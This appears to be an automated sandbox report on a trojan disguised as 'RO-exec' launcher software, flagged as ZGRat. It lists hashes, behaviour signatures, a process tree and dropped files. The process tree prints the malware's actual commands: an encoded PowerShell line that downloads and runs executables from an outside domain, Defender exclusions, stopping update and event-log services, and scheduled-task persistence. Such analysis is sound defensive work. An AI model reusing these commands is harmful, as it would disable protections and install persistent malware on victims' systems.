Analysis

  • max time kernel
    33s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2024, 09:48

General

  • Target

    RO-exec v2.0/RO-exec_Launcher.exe

  • Size

    2.3MB

  • MD5

    ee091b0aff43b9506fbc384642f44275

  • SHA1

    1f0328c27b1dcbc3bc726ab5a2fa7cafc89c0ac5

  • SHA256

    b1b4c0259825fa79fe6176502cd6900ec7411687981f8e5d9738edbd83fd9dca

  • SHA512

    06ca311ea0db212ffeb834bd703a5e545ff69e196f7973f108248361f253d91342b431fa895b516bf54fd15c91eebcd2a4a4132560bfd2ec05310cd8217c2e00

  • SSDEEP

    49152:uIYdMYohOojDmYf2r3klp0S++a3t99BDwlrFevdd39BRIbD8M:u2POo72b1SBw9crF6n3ZI

Malware Config

Signatures

  • Detect ZGRat V1 6 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\RO-exec v2.0\RO-exec_Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\RO-exec v2.0\RO-exec_Launcher.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABxAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABpAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBOAGUAegB1AHIALgBlAHgAZQAnACwAIAA8ACMAYQB4AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBOAGUAegB1AHIALgBlAHgAZQAnACkAKQA8ACMAYwB6AHcAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAHIAZQBtAG8AdABlAC8AcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcALAAgADwAIwB4AHAAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcABrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHIAYgBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAKQA8ACMAZQBwAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAeQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAbgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBnAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBxAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAHkAbgAuAGUAeABlACcAKQApADwAIwBxAHkAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATgBlAHoAdQByAC4AZQB4AGUAJwApADwAIwB6AHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAHMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgB6AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQA8ACMAaABsAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAeABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwB5AG4ALgBlAHgAZQAnACkAPAAjAGMAegBpACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4448
      • C:\Users\Admin\AppData\Roaming\Nezur.exe
        "C:\Users\Admin\AppData\Roaming\Nezur.exe"
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Suspicious behavior: LoadsDriver
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3568
      • C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2548
        • C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe
          "C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1196
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2440
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\TextInputHost.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2144
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\RuntimeBroker.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\MoUsoCoreWorker.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2920
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3672
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9i9q0RW3JC.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3268
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
                PID:1436
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                6⤵
                  PID:2024
                • C:\Windows\ModemLogs\RuntimeBroker.exe
                  "C:\Windows\ModemLogs\RuntimeBroker.exe"
                  6⤵
                    PID:4540
            • C:\Users\Admin\AppData\Roaming\conhostsyn.exe
              "C:\Users\Admin\AppData\Roaming\conhostsyn.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4664
              • C:\Users\Admin\AppData\Roaming\.conhostsyn.exe
                "C:\Users\Admin\AppData\Roaming\.conhostsyn.exe"
                4⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                PID:4620
                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1840
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3892
                  • C:\Windows\system32\wusa.exe
                    wusa /uninstall /kb:890830 /quiet /norestart
                    6⤵
                      PID:4220
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop UsoSvc
                    5⤵
                    • Launches sc.exe
                    PID:60
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    5⤵
                    • Launches sc.exe
                    PID:4940
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop wuauserv
                    5⤵
                    • Launches sc.exe
                    PID:4388
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop bits
                    5⤵
                    • Launches sc.exe
                    PID:2504
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop dosvc
                    5⤵
                    • Launches sc.exe
                    PID:4896
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    5⤵
                      PID:456
                    • C:\Windows\system32\powercfg.exe
                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      5⤵
                        PID:3236
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        5⤵
                          PID:4820
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          5⤵
                            PID:1436
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe delete "driverupdate"
                            5⤵
                            • Launches sc.exe
                            PID:4892
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                            5⤵
                            • Launches sc.exe
                            PID:3548
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop eventlog
                            5⤵
                            • Launches sc.exe
                            PID:4848
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe start "driverupdate"
                            5⤵
                            • Launches sc.exe
                            PID:3704
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4728
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4460
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4492
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Windows\fr-FR\TextInputHost.exe'" /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4032
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4884
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Windows\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:3128
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4736
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4056
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4536
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\MoUsoCoreWorker.exe'" /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:5084
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Users\Default User\MoUsoCoreWorker.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:3932
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\MoUsoCoreWorker.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:760
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4360
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:4912
                  • C:\Windows\system32\schtasks.exe
                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:3560
                  • C:\ProgramData\VC_redist.x64.exe
                    C:\ProgramData\VC_redist.x64.exe
                    1⤵
                      PID:4636
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        2⤵
                          PID:4044
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                          2⤵
                            PID:4904
                            • C:\Windows\system32\wusa.exe
                              wusa /uninstall /kb:890830 /quiet /norestart
                              3⤵
                                PID:2988
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop UsoSvc
                              2⤵
                              • Launches sc.exe
                              PID:804
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                              2⤵
                              • Launches sc.exe
                              PID:880
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop wuauserv
                              2⤵
                              • Launches sc.exe
                              PID:2884
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop bits
                              2⤵
                              • Launches sc.exe
                              PID:5068
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop dosvc
                              2⤵
                              • Launches sc.exe
                              PID:3104
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              2⤵
                                PID:1384
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                2⤵
                                  PID:2684
                                • C:\Windows\system32\powercfg.exe
                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                  2⤵
                                    PID:992
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                    2⤵
                                      PID:3996
                                    • C:\Windows\system32\conhost.exe
                                      C:\Windows\system32\conhost.exe
                                      2⤵
                                        PID:1504

                                    Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\ProgramData\VC_redist.x64.exe

                                            Filesize

                                            4.0MB

                                            MD5

                                            6f522c6f443b5e815df737613e53b422

                                            SHA1

                                            3beb085b55355b55795eddf86eb4c368c4c581b4

                                            SHA256

                                            ee0daddb04a972a955454082b2a7ab7a1459fb2c6c086ea40983b6303cf97867

                                            SHA512

                                            6964404b23f63e79f86cf1f1493bf0453d898f2e28a9521701ea6efce199dcc2f5b16885cfd89617c969fae00d98b820efddc2d8090377e65c71749a0ce1d0a1

                                          • C:\ProgramData\VC_redist.x64.exe

                                            Filesize

                                            5.2MB

                                            MD5

                                            24f54afe87c5644bc986a4ed9143277d

                                            SHA1

                                            0061a8cd4ffe0b886c2f958e7185120f9aac20a9

                                            SHA256

                                            aaa88abbf7647cb60519c678ac31095536dcde4ae5dc5587e9e6d549ea3e1b9d

                                            SHA512

                                            e518e64d5e0ade368fff0a1ae4c373a7bc20b0ee874d6001f774bb91f8b8ab0b2e31a7d904cbb787739c6c30ac3e5a1864cbd41439190fe3a0228809f8679082

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            d85ba6ff808d9e5444a4b369f5bc2730

                                            SHA1

                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                            SHA256

                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                            SHA512

                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            19KB

                                            MD5

                                            41b82c39af4486cdcb9dbdf975ffbb45

                                            SHA1

                                            b7c442c45e9d2208e7fc5f622c4a2ab0a359d3b9

                                            SHA256

                                            89e76c59a722a06f65def00b6e5488a90cdde38b71f3131e579e6f3b4180543d

                                            SHA512

                                            1e20392b62e77b2bef27f9f4a621cae85a15d3b72232abf1e4c97a48fd0b613d36e2ace340505975a205376db5701961781026e3cdbd60fa24b9306f48784318

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            948B

                                            MD5

                                            a7ce8cefc3f798abe5abd683d0ef26dd

                                            SHA1

                                            b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                                            SHA256

                                            5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                                            SHA512

                                            c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                                          • C:\Users\Admin\AppData\Local\Temp\9i9q0RW3JC.bat

                                            Filesize

                                            214B

                                            MD5

                                            d11ebe9cbc18851d1de2ff570fb760d7

                                            SHA1

                                            079dbbe6ffef259930af194d98607b5c0666da52

                                            SHA256

                                            417eea8cb4902b7248bd7b34f52b062ede7a1a0534028ca80c39073abe61e9ef

                                            SHA512

                                            0c0a7d4746dec8082ffc6b609a18beaaf5df3296d60ab57f864cf889e754c6b71e5d81a7eccca64a7675319bfee902d74f718edbed6ee08a6395a7c8a24875b6

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3t1wg2fh.wsn.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

                                            Filesize

                                            13.5MB

                                            MD5

                                            1befcac64af4c0525d46cc4f0aac89ce

                                            SHA1

                                            29d7107b3c16ca38a9d5a81cd567d66711aade97

                                            SHA256

                                            ad0fc0d49a38576a7b7cc19c7a6dc96635970c7bb58a796803f18de2a3e6bac4

                                            SHA512

                                            8019bfb5bd0466017d7459ff1c1980fddb98e740477b3c5245028d3d8a62f94837a59ee8f800cee3e5563a458c14dc4bf633ffa8556934025938e855d4139848

                                          • C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

                                            Filesize

                                            12.9MB

                                            MD5

                                            15f46ddd6b99f3d61a3db9a50be87d72

                                            SHA1

                                            e28e735dd38c38615b532f16c9085dbe5a3b05ca

                                            SHA256

                                            0c24ee86f44d4e76d59e88f9bc21a0028af3b51145de0fea2c5cd2d67a45f05d

                                            SHA512

                                            cb35ae969478b5e3a03dddbe6e166ca3b054f682703304f4dfd9769c997126075b115f11544005bf47b87d85119080410f04027503b193c61b991646302a9b24

                                          • C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

                                            Filesize

                                            1.8MB

                                            MD5

                                            4cbc4448ae101b8b9e1b02caa1040a4b

                                            SHA1

                                            00aa83be2942deeeef4f5c07a07c9be7c8160578

                                            SHA256

                                            2fa65e86a051452abd241294aa683f33741e712077290250242d2f2f1757e66a

                                            SHA512

                                            bbc7fd635e04490472e8357670a147090de10e506b8cc8d80676f5de2db819c803aab7e48d769c8c53d9920fac32485a35377773795560cab306e296d840a7b9

                                          • C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

                                            Filesize

                                            4.2MB

                                            MD5

                                            cd79c232658ae6585d4e4606422ec140

                                            SHA1

                                            530381d23ee2f73a05bcb0f83cbebed98b38ce47

                                            SHA256

                                            de38a23675514a01fcaef1c98dddf93ec9f9f3baec93fb73ee056aa28d79d1f8

                                            SHA512

                                            22ef67f152f179c34d8a38ace8d061d0aca10deed7c5eafd8259e3af84ea63baaf26510548343fba371d7bea4a148fbc2b090862c2b326d93f3010434574fc1f

                                          • C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

                                            Filesize

                                            3.2MB

                                            MD5

                                            bf1bc66d50dbe856c5af5cb63afdc898

                                            SHA1

                                            389bec596983cc38cfa8d61a64a2215205a72f02

                                            SHA256

                                            401a46e965d51a489ea2430dc6f474de2623435ad7ad8af6471daf046b371672

                                            SHA512

                                            ba13f4619cf838a9f06a1fde9861e839fdcee6fa54bf5c34fba7bccfb8b0f0806f402fac20e110982e54ad5ca146802d5ed1d0ef01d699cafa7cc2bad238ee26

                                          • C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

                                            Filesize

                                            6.2MB

                                            MD5

                                            ea5cb32d57b04c9022ee61dc54225a15

                                            SHA1

                                            c53a4c521ad89563ad5757867300aba8fdf0a5a2

                                            SHA256

                                            1ad501c9462335f3ae2aa768e5be922a21d5d19a1294e802a60215f6c07ca8fd

                                            SHA512

                                            2fa8b1c1e3cced9fc5163c66a2a04e8fe0574c985eb6c28f5b0491f49a0b46b288bbf85b0f5ef496694fcfbb766b25d59068b7086951774885343884f7ad3528

                                          • C:\Users\Admin\AppData\Roaming\Nezur.exe

                                            Filesize

                                            2.1MB

                                            MD5

                                            d6f133dee71ed4c119a2d2aaf4cf3a69

                                            SHA1

                                            d31a9b77e1eb1308c6c686e7b1715999ad18019b

                                            SHA256

                                            3c1ada57fbbe1a5fe4e56ab89545f9c38b888676ef303ffb2934d289937af83d

                                            SHA512

                                            8ef3020a156a4ffa978b89336a04c3ea3498912680e7cb5b9348d5884812bf456c8e739fba8b81d48e5234a1627e15bb5ddc2c014c5ff1c00088ab6373ce9381

                                          • C:\Users\Admin\AppData\Roaming\conhostsyn.exe

                                            Filesize

                                            3.1MB

                                            MD5

                                            912ff4e169ed2797eb2811d53fa32b21

                                            SHA1

                                            1d30a58c1361f30b000a7a6178020562ea51c9e8

                                            SHA256

                                            6d501a4c31103b36ffed7f94f5db1041b664e0aed3e94fb868a94740180a1ede

                                            SHA512

                                            a566a82d7230282ff477c5abfcfdc3c6fb6a4f3064b6f7ab3aef712bfe118460262ecbe69640c6e3c39b6b9eeebf6ff60c6aea9486342eef55f6f7e9dd086427

                                          • C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe

                                            Filesize

                                            2.7MB

                                            MD5

                                            523863b176989e0d286668451fad4451

                                            SHA1

                                            e82feee7b13e153231fb9792772f59f4d37b9101

                                            SHA256

                                            3753a3d6ce56f07f97f30a1a9577a7e9ecc324fc6c11508ac6fad7b907553390

                                            SHA512

                                            d19265f18aac97d8515716d530cf149b068b80fa82bab425890b160b2a8b2016e47a480bd187bb66496aa593fb2513bf2b5b1147d7489a5b8fa3a80ac8b964e4

                                          • C:\Windows\ModemLogs\RuntimeBroker.exe

                                            Filesize

                                            4.6MB

                                            MD5

                                            65dca75c5e4489e958c3d4c5b869db74

                                            SHA1

                                            48726e64078357f823ad7f890d370991eda3372d

                                            SHA256

                                            e2cb00fd58835e5786f979708a9778733ca7ecea514ebf65b1182377ef13be55

                                            SHA512

